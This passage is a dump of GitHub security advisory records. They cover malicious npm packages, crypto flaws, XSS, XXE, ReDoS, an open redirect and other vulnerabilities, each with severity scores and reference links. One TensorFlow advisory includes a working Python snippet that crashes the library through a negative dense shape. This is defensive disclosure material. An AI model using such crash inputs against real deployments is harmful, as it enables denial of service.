{'https://github.com/JacksonGL/NPM-Vuln-PoC/tree/master/directory-traversal/serverhuwenhui', 'https://nvd.nist.gov/vuln/detail/CVE-2017-16102', 'https://nodesecurity.io/advisories/366', 'https://www.npmjs.com/advisories/366', 'https://github.com/advisories/GHSA-rx32-c25r-79mx'}
null
GHSA
GHSA-x3m6-rprw-862w
Malicious Package in node-buc
All versions of `node-buc` contain malicious code. The package uploads system information to a remote server, downloads a file and executes it. ## Recommendation Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.
null
2021-09-30T19:50:50Z
2020-09-03T17:43:31Z
CRITICAL
9.8
{'CWE-506'}
{'https://github.com/advisories/GHSA-x3m6-rprw-862w', 'https://www.npmjs.com/advisories/1059'}
null
GHSA
GHSA-r97x-3g8f-gx3m
The Bouncy Castle JCE Provider carry a propagation bug
In the Bouncy Castle JCE Provider versions 1.51 to 1.55, a carry propagation bug was introduced in the implementation of squaring for several raw math classes have been fixed (org.bouncycastle.math.raw.Nat???). These classes are used by our custom elliptic curve implementations (org.bouncycastle.math.ec.custom.**), so there was the possibility of rare (in general usage) spurious calculations for elliptic curve scalar multiplications. Such errors would have been detected with high probability by the output validation for our scalar multipliers.
{'CVE-2016-1000340'}
2022-04-27T13:27:34Z
2018-10-17T16:23:50Z
HIGH
7.5
null
{'https://www.oracle.com/security-alerts/cpuoct2020.html', 'https://github.com/bcgit/bc-java/commit/790642084c4e0cadd47352054f868cc8397e2c00#diff-e5934feac8203ca0104ab291a3560a31', 'https://security.netapp.com/advisory/ntap-20181127-0004/', 'https://access.redhat.com/errata/RHSA-2018:2669', 'https://github.com/advisories/GHSA-r97x-3g8f-gx3m', 'https://nvd.nist.gov/vuln/detail/CVE-2016-1000340', 'https://access.redhat.com/errata/RHSA-2018:2927'}
null
GHSA
GHSA-rrm8-32g4-w8m3
Cross-site Request Forgery (CSRF)
CSRF in Bitly oauth2_proxy 2.1 during authentication flow
{'CVE-2017-1000069'}
2021-12-20T18:04:46Z
2021-12-20T18:04:46Z
HIGH
8.8
{'CWE-352'}
{'https://github.com/advisories/GHSA-rrm8-32g4-w8m3', 'https://github.com/bitly/oauth2_proxy/pull/360', 'https://nvd.nist.gov/vuln/detail/CVE-2017-1000069', 'https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-1000069', 'https://github.com/bitly/oauth2_proxy/commit/55085d9697962668fd4e43e8e4644144fe83cd93'}
null
GHSA
GHSA-6pwf-whc8-hjf6
Downloads Resources over HTTP in baryton-saxophone
Affected versions of `baryton-saxophone` insecurely download an executable over an unencrypted HTTP connection. In scenarios where an attacker has a privileged network position, it is possible to intercept the response and replace the executable with a malicious one, resulting in code execution on the system running `baryton-saxophone`. ## Recommendation Update to version 3.0.1 or later.
{'CVE-2016-10573'}
2021-01-08T19:20:40Z
2019-02-18T23:35:18Z
HIGH
0
{'CWE-311'}
{'https://github.com/advisories/GHSA-6pwf-whc8-hjf6', 'https://www.npmjs.com/advisories/240', 'https://nvd.nist.gov/vuln/detail/CVE-2016-10573', 'https://nodesecurity.io/advisories/240'}
null
GHSA
GHSA-r98r-j25q-rmpr
Type confusion in failure
An issue was discovered in the failure crate through 2019-11-13 for Rust. Type confusion can occur when __private_get_type_id__ is overridden.
{'CVE-2019-25010'}
2021-08-25T20:46:38Z
2021-08-25T20:46:38Z
CRITICAL
9.8
{'CWE-843'}
{'https://github.com/advisories/GHSA-r98r-j25q-rmpr', 'https://nvd.nist.gov/vuln/detail/CVE-2019-25010', 'https://rustsec.org/advisories/RUSTSEC-2019-0036.html', 'https://github.com/rust-lang-nursery/failure/issues/336'}
null
GHSA
GHSA-2j2x-hx4g-2gf4
In Bouncy Castle JCE Provider the DHIES implementation allowed the use of ECB mode
In the Bouncy Castle JCE Provider version 1.55 and earlier the DHIES implementation allowed the use of ECB mode. This mode is regarded as unsafe and support for it has been removed from the provider.
{'CVE-2016-1000344'}
2022-04-27T13:32:11Z
2018-10-18T17:43:55Z
HIGH
7.4
{'CWE-1310'}
{'https://github.com/advisories/GHSA-2j2x-hx4g-2gf4', 'https://www.oracle.com/security-alerts/cpuoct2020.html', 'https://nvd.nist.gov/vuln/detail/CVE-2016-1000344', 'https://security.netapp.com/advisory/ntap-20181127-0004/', 'https://access.redhat.com/errata/RHSA-2018:2669', 'https://github.com/bcgit/bc-java/commit/9385b0ebd277724b167fe1d1456e3c112112be1f', 'https://access.redhat.com/errata/RHSA-2018:2927'}
null
GHSA
GHSA-54mg-vgrp-mwx9
Use of Cryptographically Weak Pseudo-Random Number Generator (PRNG) in Ratpack
Ratpack versions before 1.6.1 generate a session ID using a cryptographically weak PRNG in the JDK's ThreadLocalRandom. This means that if an attacker can determine a small window for the server start time and obtain a session ID value, they can theoretically determine the sequence of session IDs.
{'CVE-2019-11808'}
2021-08-04T15:01:31Z
2019-05-14T04:01:37Z
LOW
3.7
{'CWE-338'}
{'https://nvd.nist.gov/vuln/detail/CVE-2019-11808', 'https://github.com/ratpack/ratpack/releases/tag/v1.6.1', 'https://github.com/advisories/GHSA-54mg-vgrp-mwx9', 'https://github.com/ratpack/ratpack/issues/1448', 'https://github.com/ratpack/ratpack/commit/f2b63eb82dd71194319fd3945f5edf29b8f3a42d'}
null
GHSA
GHSA-288c-cq4h-88gq
XML External Entity (XXE) Injection in Jackson Databind
A flaw was found in FasterXML Jackson Databind, where it did not have entity expansion secured properly. This flaw allows vulnerability to XML external entity (XXE) attacks. The highest threat from this vulnerability is data integrity.
{'CVE-2020-25649'}
2022-04-22T17:22:57Z
2021-02-18T20:51:54Z
HIGH
7.5
{'CWE-611'}
{'https://www.oracle.com/security-alerts/cpuapr2022.html', 'https://lists.apache.org/thread.html/r1b7ed0c4b6c4301d4dfd6fdbc5581b0a789d3240cab55d766f33c6c6@%3Cjira.kafka.apache.org%3E', 'https://lists.apache.org/thread.html/r2f5c5479f99398ef344b7ebd4d90bc3316236c45d0f3bc42090efcd7@%3Cissues.hive.apache.org%3E', 'https://lists.apache.org/thread.html/r61db8e7dcb56dc000a5387a88f7a473bacec5ee01b9ff3f55308aacc@%3Cdev.kafka.apache.org%3E', 'https://lists.apache.org/thread.html/r2882fc1f3032cd7be66e28787f04ec6f1874ac68d47e310e30ff7eb1@%3Cjira.kafka.apache.org%3E', 'https://github.com/advisories/GHSA-288c-cq4h-88gq', 'https://lists.apache.org/thread.html/r7cb5b4b3e4bd41a8042e5725b7285877a17bcbf07f4eb3f7b316af60@%3Creviews.iotdb.apache.org%3E', 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6X2UT4X6M7DLQYBOOHMXBWGYJ65RL2CT/', 'https://lists.apache.org/thread.html/r2eb66c182853c69ecfb52f63d3dec09495e9b65be829fd889a081ae1@%3Cdev.hive.apache.org%3E', 'https://lists.apache.org/thread.html/r68d029ee74ab0f3b0569d0c05f5688cb45dd3abe96a6534735252805@%3Cnotifications.zookeeper.apache.org%3E', 'https://lists.apache.org/thread.html/r6b11eca1d646f45eb0d35d174e6b1e47cfae5295b92000856bfb6304@%3Cusers.kafka.apache.org%3E', 'https://lists.apache.org/thread.html/r86c78bf7656fdb2dab69cbf17f3d7492300f771025f1a3a65d5e5ce5@%3Ccommits.zookeeper.apache.org%3E', 'https://lists.apache.org/thread.html/r95a297eb5fd1f2d3a2281f15340e2413f952e9d5503296c3adc7201a@%3Ccommits.tomee.apache.org%3E', 'https://lists.apache.org/thread.html/rc82ff47853289e9cd17f5cfbb053c04cafc75ee32e3d7223963f83bb@%3Cdev.knox.apache.org%3E', 'https://www.oracle.com/security-alerts/cpuApr2021.html', 'https://lists.apache.org/thread.html/r011d1430e8f40dff9550c3bc5d0f48b14c01ba8aecabd91d5e495386@%3Ccommits.turbine.apache.org%3E', 'https://lists.apache.org/thread.html/r900d4408c4189b376d1ec580ea7740ea6f8710dc2f0b7e9c9eeb5ae0@%3Cdev.zookeeper.apache.org%3E', 'https://lists.apache.org/thread.html/r45e7350dfc92bb192f3f88e9971c11ab2be0953cc375be3dda5170bd@%3Cissues.flink.apache.org%3E', 'https://lists.apache.org/thread.html/ra1157e57a01d25e36b0dc17959ace758fc21ba36746de29ba1d8b130@%3Cjira.kafka.apache.org%3E', 'https://www.oracle.com/security-alerts/cpuoct2021.html', 'https://lists.apache.org/thread.html/r8937a7160717fe8b2221767163c4de4f65bc5466405cb1c5310f9080@%3Cdev.kafka.apache.org%3E', 'https://lists.apache.org/thread.html/r90d1e97b0a743cf697d89a792a9b669909cc5a1692d1e0083a22e66c@%3Cissues.zookeeper.apache.org%3E', 'https://lists.apache.org/thread.html/r8ae961c80930e2717c75025414ce48a432cea1137c02f648b1fb9524@%3Cissues.hive.apache.org%3E', 'https://lists.apache.org/thread.html/re96dc7a13e13e56190a5d80f9e5440a0d0c83aeec6467b562fbf2dca@%3Cjira.kafka.apache.org%3E', 'https://lists.apache.org/thread.html/r61db8e7dcb56dc000a5387a88f7a473bacec5ee01b9ff3f55308aacc@%3Cusers.kafka.apache.org%3E', 'https://lists.apache.org/thread.html/r605764e05e201db33b3e9c2e66ff620658f07ad74f296abe483f7042@%3Creviews.iotdb.apache.org%3E', 'https://lists.apache.org/thread.html/r6e3d4f7991542119a4ca6330271d7fbf7b9fb3abab24ada82ddf1ee4@%3Cnotifications.zookeeper.apache.org%3E', 'https://lists.apache.org/thread.html/r91722ecfba688b0c565675f8bf380269fde8ec62b54d6161db544c22@%3Ccommits.karaf.apache.org%3E', 'https://lists.apache.org/thread.html/re16f81d3ad49a93dd2f0cba9f8fc88e5fb89f30bf9a2ad7b6f3e69c1@%3Ccommits.karaf.apache.org%3E', 'https://lists.apache.org/thread.html/rdca8711bb7aa5d47a44682606cd0ea3497e2e922f22b7ee83e81e6c1@%3Cissues.hive.apache.org%3E', 'https://lists.apache.org/thread.html/r31f4ee7d561d56a0c2c2c6eb1d6ce3e05917ff9654fdbfec05dc2b83@%3Ccommits.servicecomb.apache.org%3E', 'https://lists.apache.org/thread.html/r6a4f3ef6edfed2e0884269d84798f766779bbbc1005f7884e0800d61@%3Cdev.knox.apache.org%3E', 'https://lists.apache.org/thread.html/rf1809a1374041a969d77afab21fc38925de066bc97e86157d3ac3402@%3Ccommits.karaf.apache.org%3E', 'https://lists.apache.org/thread.html/r6a6df5647583541e3cb71c75141008802f7025cee1c430d4ed78f4cc@%3Cissues.hive.apache.org%3E', 'https://www.oracle.com/security-alerts/cpujan2022.html', 'https://lists.apache.org/thread.html/r6b11eca1d646f45eb0d35d174e6b1e47cfae5295b92000856bfb6304@%3Cdev.kafka.apache.org%3E', 'https://lists.apache.org/thread.html/rc15e90bbef196a5c6c01659e015249d6c9a73581ca9afb8aeecf00d2@%3Cjira.kafka.apache.org%3E', 'https://github.com/FasterXML/jackson-databind/issues/2589', 'https://lists.apache.org/thread.html/r3e6ae311842de4e64c5d560a475b7f9cc7e0a9a8649363c6cf7537eb@%3Ccommits.karaf.apache.org%3E', 'https://lists.apache.org/thread.html/rc959cdb57c4fe198316130ff4a5ecbf9d680e356032ff2e9f4f05d54@%3Cjira.kafka.apache.org%3E', 'https://lists.apache.org/thread.html/r8937a7160717fe8b2221767163c4de4f65bc5466405cb1c5310f9080@%3Cusers.kafka.apache.org%3E', 'https://lists.apache.org/thread.html/ra95faf968f3463acb3f31a6fbec31453fc5045325f99f396961886d3@%3Cissues.flink.apache.org%3E', 'https://lists.apache.org/thread.html/r78d53a0a269c18394daf5940105dc8c7f9a2399503c2e78be20abe7e@%3Cjira.kafka.apache.org%3E', 'https://lists.apache.org/thread.html/rb674520b9f6c808c1bf263b1369e14048ec3243615f35cfd24e33604@%3Cissues.zookeeper.apache.org%3E', 'https://lists.apache.org/thread.html/r98bfe3b90ea9408f12c4b447edcb5638703d80bc782430aa0c210a54@%3Cissues.zookeeper.apache.org%3E', 'https://lists.apache.org/thread.html/rc88f2fa2b7bd6443921727aeee7704a1fb02433e722e2abf677e0d3d@%3Ccommits.zookeeper.apache.org%3E', 'https://lists.apache.org/thread.html/rd317f15a675d114dbf5b488d27eeb2467b4424356b16116eb18a652d@%3Cjira.kafka.apache.org%3E', 'https://lists.apache.org/thread.html/r0881e23bd9034c8f51fdccdc8f4d085ba985dcd738f8520569ca5c3d@%3Cissues.hive.apache.org%3E', 'https://lists.apache.org/thread.html/r63c87aab97155f3f3cbe11d030c4a184ea0de440ee714977db02e956@%3Cjira.kafka.apache.org%3E', 'https://lists.apache.org/thread.html/rd57c7582adc90e233f23f3727db3df9115b27a823b92374f11453f34@%3Cissues.hive.apache.org%3E', 'https://lists.apache.org/thread.html/rbf4ce74b0d1fa9810dec50ba3ace0caeea677af7c27a97111c06ccb7@%3Cusers.kafka.apache.org%3E', 'https://lists.apache.org/thread.html/rd6f6bf848c2d47fa4a85c27d011d948778b8f7e58ba495968435a0b3@%3Cissues.zookeeper.apache.org%3E', 'https://lists.apache.org/thread.html/rbf4ce74b0d1fa9810dec50ba3ace0caeea677af7c27a97111c06ccb7@%3Cdev.kafka.apache.org%3E', 'https://lists.apache.org/thread.html/r6cbd599b80e787f02ff7a1391d9278a03f37d6a6f4f943f0f01a62fb@%3Creviews.iotdb.apache.org%3E', 'https://lists.apache.org/thread.html/r407538adec3185dd35a05c9a26ae2f74425b15132470cf540f41d85b@%3Cissues.hive.apache.org%3E', 'https://bugzilla.redhat.com/show_bug.cgi?id=1887664', 'https://lists.apache.org/thread.html/ra409f798a1e5a6652b7097429b388650ccd65fd958cee0b6f69bba00@%3Cissues.hive.apache.org%3E', 'https://security.netapp.com/advisory/ntap-20210108-0007/', 'https://lists.apache.org/thread.html/r8764bb835bcb8e311c882ff91dd3949c9824e905e880930be56f6ba3@%3Cuser.spark.apache.org%3E', 'https://lists.apache.org/thread.html/r04529cedaca40c2ff90af4880493f9c88a8ebf4d1d6c861d23108a5a@%3Cnotifications.zookeeper.apache.org%3E', 'https://lists.apache.org/thread.html/r024b7bda9c43c5560d81238748775c5ecfe01b57280f90df1f773949@%3Cissues.hive.apache.org%3E', 'https://lists.apache.org/thread.html/r73bef1bb601a9f093f915f8075eb49fcca51efade57b817afd5def07@%3Ccommits.iotdb.apache.org%3E', 'https://lists.apache.org/thread.html/r94c7e86e546120f157264ba5ba61fd29b3a8d530ed325a9b4fa334d7@%3Ccommits.zookeeper.apache.org%3E', 'https://lists.apache.org/thread.html/r5b130fe668503c4b7e2caf1b16f86b7f2070fd1b7ef8f26195a2ffbd@%3Cissues.hive.apache.org%3E', 'https://lists.apache.org/thread.html/r5f8a1608d758936bd6bbc5eed980777437b611537bf6fff40663fc71@%3Cjira.kafka.apache.org%3E', 'https://nvd.nist.gov/vuln/detail/CVE-2020-25649', 'https://lists.apache.org/thread.html/rdf9a34726482222c90d50ae1b9847881de67dde8cfde4999633d2cdc@%3Ccommits.zookeeper.apache.org%3E', 'https://lists.apache.org/thread.html/r2b6ddb3a4f4cd11d8f6305011e1b7438ba813511f2e3ab3180c7ffda@%3Ccommits.druid.apache.org%3E', 'https://lists.apache.org/thread.html/r0b8dc3acd4503e4ecb6fbd6ea7d95f59941168d8452ac0ab1d1d96bb@%3Cissues.zookeeper.apache.org%3E', 'https://lists.apache.org/thread.html/raf13235de6df1d47a717199e1ecd700dff3236632f5c9a1488d9845b@%3Cjira.kafka.apache.org%3E', 'https://lists.apache.org/thread.html/r765283e145049df9b8998f14dcd444345555aae02b1610cfb3188bf8@%3Cnotifications.iotdb.apache.org%3E', 'https://www.oracle.com//security-alerts/cpujul2021.html'}
null
GHSA
GHSA-vpw5-grxx-v396
CSRF token exposure in TYPO3 extension
When using the CsrfTokenViewHelper the extension discloses the user's session identifier to HTML output without processing of additional cryptographic hashing algorithms. This vulnerability cannot be exploited directly and occurs in combination with a chained attack - like for instance Cross Site Scripting in the frontend output.
{'CVE-2021-36793'}
2021-09-02T17:16:56Z
2021-09-02T17:16:56Z
HIGH
6.3
{'CWE-668'}
{'https://typo3.org/security/advisory/typo3-ext-sa-2021-008', 'https://github.com/advisories/GHSA-vpw5-grxx-v396', 'https://nvd.nist.gov/vuln/detail/CVE-2021-36793'}
null
GHSA
GHSA-w3g5-2848-2v8r
Data races in generator
The `Generator` type is an iterable which uses a generator function that yields values. In affected versions of the crate, the provided function yielding values had no `Send` bounds despite the `Generator` itself implementing `Send`. The generator function lacking a `Send` bound means that types that are dangerous to send across threads such as `Rc` could be sent as part of a generator, potentially leading to data races. This flaw was fixed in commit [`f7d120a3b`](https://github.com/Xudong-Huang/generator-rs/commit/f7d120a3b724d06a7b623d0a4306acf8f78cb4f0) by enforcing that the generator function be bound by `Send`.
{'CVE-2020-36471'}
2021-08-25T20:57:05Z
2021-08-25T20:57:05Z
MODERATE
5.9
{'CWE-362'}
{'https://github.com/Xudong-Huang/generator-rs/issues/27', 'https://rustsec.org/advisories/RUSTSEC-2020-0151.html', 'https://github.com/Xudong-Huang/generator-rs/commit/f7d120a3b724d06a7b623d0a4306acf8f78cb4f0', 'https://github.com/advisories/GHSA-w3g5-2848-2v8r', 'https://nvd.nist.gov/vuln/detail/CVE-2020-36471'}
null
GHSA
GHSA-gj77-59wh-66hg
Regular Expression Denial of Service (ReDoS) in Prism
Some languages before 1.24.0 are vulnerable to Regular Expression Denial of Service (ReDoS). ### Impact When Prism is used to highlight untrusted (user-given) text, an attacker can craft a string that will take a very very long time to highlight. Do not use the following languages to highlight untrusted text. - ASCIIDoc - ERB Other languages are __not__ affected and can be used to highlight untrusted text. ### Patches This problem has been fixed in Prism v1.24. ### References - PrismJS/prism#2774 - PrismJS/prism#2688
{'CVE-2021-32723'}
2022-02-08T21:21:39Z
2021-06-28T18:33:18Z
HIGH
7.4
{'CWE-400'}
{'https://github.com/PrismJS/prism/pull/2688', 'https://github.com/PrismJS/prism/commit/d85e30da6755fdbe7f8559f8e75d122297167018', 'https://github.com/PrismJS/prism/security/advisories/GHSA-gj77-59wh-66hg', 'https://github.com/PrismJS/prism/pull/2774', 'https://github.com/advisories/GHSA-gj77-59wh-66hg', 'https://nvd.nist.gov/vuln/detail/CVE-2021-32723', 'https://www.oracle.com/security-alerts/cpujan2022.html'}
null
GHSA
GHSA-8877-prq4-9xfw
Open Redirect in actionpack
The Host Authorization middleware in Action Pack before 6.1.2.1, 6.0.3.5 suffers from an open redirect vulnerability. Specially crafted `Host` headers in combination with certain "allowed host" formats can cause the Host Authorization middleware in Action Pack to redirect users to a malicious website. Impacted applications will have allowed hosts with a leading dot. When an allowed host contains a leading dot, a specially crafted `Host` header can be used to redirect to a malicious website.
{'CVE-2021-22881'}
2021-12-15T00:05:17Z
2021-03-02T03:44:17Z
MODERATE
6.1
{'CWE-601'}
{'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XQ3NS4IBYE2I3MVMGAHFZBZBIZGHXHT3/', 'https://benjamin-bouchet.com/cve-2021-22881-faille-de-securite-dans-le-middleware-hostauthorization/', 'http://www.openwall.com/lists/oss-security/2021/12/14/5', 'https://nvd.nist.gov/vuln/detail/CVE-2021-22881', 'https://discuss.rubyonrails.org/t/cve-2021-22881-possible-open-redirect-in-host-authorization-middleware/77130', 'https://hackerone.com/reports/1047447', 'http://www.openwall.com/lists/oss-security/2021/08/20/1', 'http://www.openwall.com/lists/oss-security/2021/05/05/2', 'https://rubygems.org/gems/actionpack', 'https://github.com/advisories/GHSA-8877-prq4-9xfw'}
null
GHSA
GHSA-vmh4-322v-cfpc
Cross-Site Scripting in cmmn-js-properties-panel
Versions of `cmmn-js-properties-panel` prior to 0.8.0 are vulnerable to Cross-Site Scripting (XSS). The package fails to sanitize input in specially configured diagrams, which may allow attackers to inject arbitrary JavaScript in the embedding website. ## Recommendation Upgrade to version 0.8.0 or later.
null
2021-09-29T15:57:06Z
2020-09-03T18:18:06Z
HIGH
0
{'CWE-79'}
{'https://github.com/advisories/GHSA-vmh4-322v-cfpc', 'https://www.npmjs.com/advisories/1080'}
null
GHSA
GHSA-fmfv-x8mp-5767
Improper input validation in Drupal core
Drupal core's form API has a vulnerability where certain contributed or custom modules' forms may be vulnerable to improper input validation. This could allow an attacker to inject disallowed values or overwrite data. Affected forms are uncommon, but in certain cases an attacker could alter critical or sensitive data.
{'CVE-2022-25271'}
2022-03-01T21:18:21Z
2022-02-18T00:00:37Z
HIGH
7.5
{'CWE-20'}
{'https://www.drupal.org/sa-core-2022-003', 'https://github.com/advisories/GHSA-fmfv-x8mp-5767', 'https://nvd.nist.gov/vuln/detail/CVE-2022-25271'}
null
GHSA
GHSA-9m87-6fj3-c5xh
Untrusted Search Path in PNPM
PNPM prior to v6.15.1 was discovered to contain an untrusted search path which causes the application to behave in unexpected ways when users execute PNPM commands in a directory containing malicious content. This vulnerability occurs when the application is ran on Windows OS.
{'CVE-2022-26183'}
2022-03-30T21:04:53Z
2022-03-23T00:00:24Z
HIGH
8.8
{'CWE-426'}
{'https://github.com/advisories/GHSA-9m87-6fj3-c5xh', 'https://nvd.nist.gov/vuln/detail/CVE-2022-26183', 'https://github.com/pnpm/pnpm/commit/04b7f60861ddee8331e50d70e193d1e701abeefb', 'https://github.com/pnpm/pnpm/releases/tag/v6.15.1'}
null
GHSA
GHSA-m2mx-rfpw-jghv
DLL Injection in kerberos
Version of `kerberos` prior to 1.0.0 are vulnerable to DLL Injection. The package loads DLLs without specifying a full path. This may allow attackers to create a file with the same name in a folder that precedes the intended file in the DLL path search. Doing so would allow attackers to execute arbitrary code in the machine. ## Recommendation Upgrade to version 1.0.0 or later.
null
2020-09-04T18:01:59Z
2020-09-04T18:01:59Z
HIGH
0
null
{'https://github.com/advisories/GHSA-m2mx-rfpw-jghv', 'https://www.npmjs.com/advisories/1514'}
null
GHSA
GHSA-5wm5-8q42-rhxg
File system access via H2 in Apache Ignite
Apache Ignite uses H2 database to build SQL distributed execution engine. H2 provides SQL functions which could be used by attacker to access to a filesystem.
{'CVE-2020-1963'}
2022-02-08T22:05:37Z
2020-06-05T16:11:02Z
CRITICAL
9.1
{'CWE-862'}
{'https://lists.apache.org/thread.html/r1933faf8a26c431f38a5f8dbbfab80254454e54e33a79be474b67dc4%40%3Cdev.ignite.apache.org%3E', 'https://lists.apache.org/thread.html/re7b43cf8333ee30b6589e465f72a6ed4a082222612d1a0fdd30beb94@%3Cuser.ignite.apache.org%3E', 'https://lists.apache.org/thread.html/rd43ae18588fd7bdb375be63bc95a651aab319ced6306759e1237ce67@%3Cdev.ignite.apache.org%3E', 'https://lists.apache.org/thread.html/rdf37011b92a31a67c299ff45655e2638f194fc814e5c6e2fde352884@%3Cuser.ignite.apache.org%3E', 'https://github.com/advisories/GHSA-5wm5-8q42-rhxg', 'https://lists.apache.org/thread.html/rdf37011b92a31a67c299ff45655e2638f194fc814e5c6e2fde352884@%3Cdev.ignite.apache.org%3E', 'https://nvd.nist.gov/vuln/detail/CVE-2020-1963', 'http://www.openwall.com/lists/oss-security/2020/06/03/2', 'https://lists.apache.org/thread.html/r119024ef71c8d39f952df0950a275d09714715179aff544aea0129a3@%3Cuser.ignite.apache.org%3E', 'https://lists.apache.org/thread.html/re7b43cf8333ee30b6589e465f72a6ed4a082222612d1a0fdd30beb94@%3Cdev.ignite.apache.org%3E', 'https://lists.apache.org/thread.html/rf032a13a4711f88c0a2c0734eecbee1026cc1b6cde27d16a653f8755@%3Cdev.ignite.apache.org%3E', 'https://www.oracle.com/security-alerts/cpujan2022.html'}
null
GHSA
GHSA-hr84-fqvp-48mm
Segfault in SparseCountSparseOutput
### Impact Specifying a negative dense shape in `tf.raw_ops.SparseCountSparseOutput` results in a segmentation fault being thrown out from the standard library as `std::vector` invariants are broken. ```python import tensorflow as tf indices = tf.constant([], shape=[0, 0], dtype=tf.int64) values = tf.constant([], shape=[0, 0], dtype=tf.int64) dense_shape = tf.constant([-100, -100, -100], shape=[3], dtype=tf.int64) weights = tf.constant([], shape=[0, 0], dtype=tf.int64) tf.raw_ops.SparseCountSparseOutput(indices=indices, values=values, dense_shape=dense_shape, weights=weights, minlength=79, maxlength=96, binary_output=False) ``` This is because the [implementation](https://github.com/tensorflow/tensorflow/blob/8f7b60ee8c0206a2c99802e3a4d1bb55d2bc0624/tensorflow/core/kernels/count_ops.cc#L199-L213) assumes the first element of the dense shape is always positive and uses it to initialize a `BatchedMap<T>` (i.e., [`std::vector<absl::flat_hash_map<int64,T>>`](https://github.com/tensorflow/tensorflow/blob/8f7b60ee8c0206a2c99802e3a4d1bb55d2bc0624/tensorflow/core/kernels/count_ops.cc#L27)) data structure. ```cc bool is_1d = shape.NumElements() == 1; int num_batches = is_1d ? 1 : shape.flat<int64>()(0); ... auto per_batch_counts = BatchedMap<W>(num_batches); ``` If the `shape` tensor has more than one element, `num_batches` is the first value in `shape`. Ensuring that the `dense_shape` argument is a valid tensor shape (that is, all elements are non-negative) solves this issue. ### Patches We have patched the issue in GitHub commit [c57c0b9f3a4f8684f3489dd9a9ec627ad8b599f5](https://github.com/tensorflow/tensorflow/commit/c57c0b9f3a4f8684f3489dd9a9ec627ad8b599f5). The fix will be included in TensorFlow 2.5.0. We will also cherrypick this commit on TensorFlow 2.4.2 and TensorFlow 2.3.3. ### For more information Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. ### Attribution This vulnerability has been reported by Yakun Zhang and Ying Wang of Baidu X-Team.
{'CVE-2021-29521'}
2021-05-21T14:21:16Z
2021-05-21T14:21:16Z
LOW
2.5
{'CWE-131'}
{'https://nvd.nist.gov/vuln/detail/CVE-2021-29521', 'https://github.com/tensorflow/tensorflow/commit/c57c0b9f3a4f8684f3489dd9a9ec627ad8b599f5', 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-hr84-fqvp-48mm', 'https://github.com/advisories/GHSA-hr84-fqvp-48mm'}
null
GHSA
GHSA-3qpg-33wr-533j
Improper Restriction of XML External Entity Reference in Magnolia CMS
An issue in the Export function of Magnolia v6.2.3 and below allows attackers to execute arbitrary code via a crafted XLF file.
{'CVE-2021-46365'}
2022-04-20T19:13:59Z
2022-02-12T00:00:37Z
HIGH
7.8
{'CWE-611'}
{'https://github.com/advisories/GHSA-3qpg-33wr-533j', 'https://docs.magnolia-cms.com/product-docs/6.2/Releases/Release-notes-for-Magnolia-CMS-6.2.4.html#_security_advisory', 'https://nvd.nist.gov/vuln/detail/CVE-2021-46365', 'https://github.com/DrunkenShells/Disclosures/tree/master/CVE-2021-46365-Unsafe%20XML%20Parsing-Magnolia%20CMS'}
null
GHSA
GHSA-w736-hf9p-qqh3
Key Caching behavior in the DynamoDB Encryption Client.
### Impact This advisory concerns users of MostRecentProvider in the DynamoDB Encryption Client with a key provider like AWS Key Management Service that allows for permissions on keys to be modified. When key usage permissions were changed at the key provider, time-based key reauthorization logic in MostRecentProvider did not reauthorize the use of the key. This created the potential for keys to be used in the DynamoDB Encryption Client after permissions to do so were revoked at the key provider. ### Patches Fixed as of 1.15.0. We recommend users to modify their code and adopt `CachingMostRecentProvider`. ### Workarounds Users who cannot upgrade to use the `CachingMostRecentProvider` can call `clear()` on the cache to manually flush all of its contents. Next use of the key will force a re-validation to occur with the key provider.
null
2021-02-08T17:43:36Z
2021-02-08T17:43:36Z
LOW
0
{'CWE-862'}
{'https://github.com/aws/aws-dynamodb-encryption-java/blob/master/CHANGELOG.md#1150----2021-02-04', 'https://github.com/advisories/GHSA-w736-hf9p-qqh3', 'https://github.com/aws/aws-dynamodb-encryption-java/commit/7de5f5a5929271ab25bce685089eb7ec564dac4b', 'https://github.com/aws/aws-dynamodb-encryption-java/security/advisories/GHSA-w736-hf9p-qqh3'}
null
GHSA
GHSA-c5xm-m64m-f2vq
Malicious Package in cxct
All versions of `cxct` contain malicious code. The package finds and exfiltrates cryptocurrency wallets. ## Recommendation Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.
null
2021-10-01T20:13:31Z
2020-09-04T15:23:47Z
CRITICAL
9.8
{'CWE-506'}
{'https://www.npmjs.com/advisories/1344', 'https://github.com/advisories/GHSA-c5xm-m64m-f2vq'}
null
GHSA
GHSA-wmwp-pggc-h4mj
Cross-site Scripting in Documize
domain/section/markdown/markdown.go in Documize before 3.5.1 mishandles untrusted Markdown content. This was addressed by adding the bluemonday HTML sanitizer to defend against XSS.
{'CVE-2019-19619'}
2021-05-18T15:30:30Z
2021-05-18T15:30:30Z
MODERATE
6.1
{'CWE-79'}
{'https://github.com/documize/community/releases/tag/v3.5.1', 'https://github.com/documize/community/compare/v3.5.0...v3.5.1', 'https://github.com/documize/community/commit/a4384210d4d0d6b18e6fdb7e155de96d4a1cf9f3', 'https://nvd.nist.gov/vuln/detail/CVE-2019-19619', 'https://github.com/advisories/GHSA-wmwp-pggc-h4mj'}
null
GHSA
GHSA-73hr-6785-f5p8
Malicious Package in donotinstallthis
The package `donotinstallthis` contained malicious code. The package contained a script that was run as part of the install script. The script contacted a remote service tracking how many installations were done. There is no further compromise. ## Recommendation Remove the package from your environment.
null
2021-09-30T21:25:01Z
2020-09-02T21:24:55Z
CRITICAL
9.8
{'CWE-506'}
{'https://github.com/advisories/GHSA-73hr-6785-f5p8', 'https://www.npmjs.com/advisories/887'}
null
GHSA
GHSA-jmv4-73v2-pvgc
Cross-site Scripting in OpenNMS Horizon
